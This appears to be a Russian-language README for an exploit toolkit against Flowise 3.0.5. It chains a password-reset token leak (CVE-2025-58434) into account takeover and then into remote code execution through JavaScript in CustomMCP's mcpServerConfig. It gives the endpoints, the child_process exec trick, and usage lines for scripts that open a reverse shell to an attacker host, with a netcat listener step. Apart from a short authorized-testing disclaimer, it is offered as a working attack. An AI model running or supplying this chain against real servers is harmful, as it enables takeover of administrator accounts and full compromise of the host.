
Эксплуатационная цепочка для Flowise 3.0.5: несанкционированный захват учётной записи через раскрытие токена сброса пароля (CVE-2025-58434) в связке с выполнением JavaScript в CustomMCP для удалённого выполнения кода.
Две проблемы Flowise 3.0.5, объединённые в цепочку:
POST /api/v1/account/forgot-password возвращает tempToken целевого пользователя
непосредственно в JSON-ответе. Передайте его в POST /api/v1/account/reset-password,
чтобы установить известный пароль для любой учётной записи, включая первого администратора -> полный
несанкционированный захват учётной записи.mcpServerConfig CustomMCP.
Имея сессию и ключ API рабочей области (из шага 1),
POST /api/v1/node-load-method/customMCP с loadMethod=listActions
выполняет строку mcpServerConfig как JavaScript в процессе Flowise,
что даёт RCE через . (Отдельная проблема Flowise,
используемая здесь только для превращения ATO в выполнение кода; на момент написания
CVE не присвоен.)require('child_process').exec()CVE: CVE-2025-58434
python3 -m pip install requests
flowise_ato_foothold.py — полная цепочка (ATO -> ключ API -> reverse shell через CustomMCP)python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# подготовьте `nc -lvnp <LPORT>`
flowise_customMCP_rce.py — только RCE через CustomMCP (требуется ключ API)python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'
Только для авторизованного тестирования безопасности и образовательных целей. Запускайте это только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.
Автор: r3vpwnx